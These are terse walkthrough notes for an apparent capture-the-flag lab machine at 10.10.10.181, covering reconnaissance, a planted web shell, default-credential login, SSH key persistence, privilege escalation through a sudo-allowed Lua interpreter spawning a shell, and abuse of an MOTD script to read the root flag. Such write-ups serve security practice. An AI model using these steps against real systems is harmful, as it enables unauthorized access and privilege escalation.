autorecon -ct 1 -cs 10 -v --only-scans-dir 10.10.10.181
Port 80 was open:
The HTML Source showed:
<center> <h1>This site has been owned</h1> <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2> <h3> - Xh4H - </h3> <!--Some of the best web shells that you might need ;)--> </center>
Looked up Xh4H and web shell. Logged in with admin/admin
Created myself a Public Key:
ssh-keygen id_rsa echo 'contents of id_rsa.pub' > /home/webadmin/.ssh/authorized_keys
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
Luvit was running sysadmin privs. Executed a Shell –
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
Added myself to authorized keys under sysadmin.
echo 'contents of id_rsa.pub' > /home/sysadmin/.ssh/authorized_keys
Noticed this was the header files when logging into SSH.
echo "cat /root/root.txt" >> /etc/update-motd.d/00-header
Logged out of SSH and logged back in: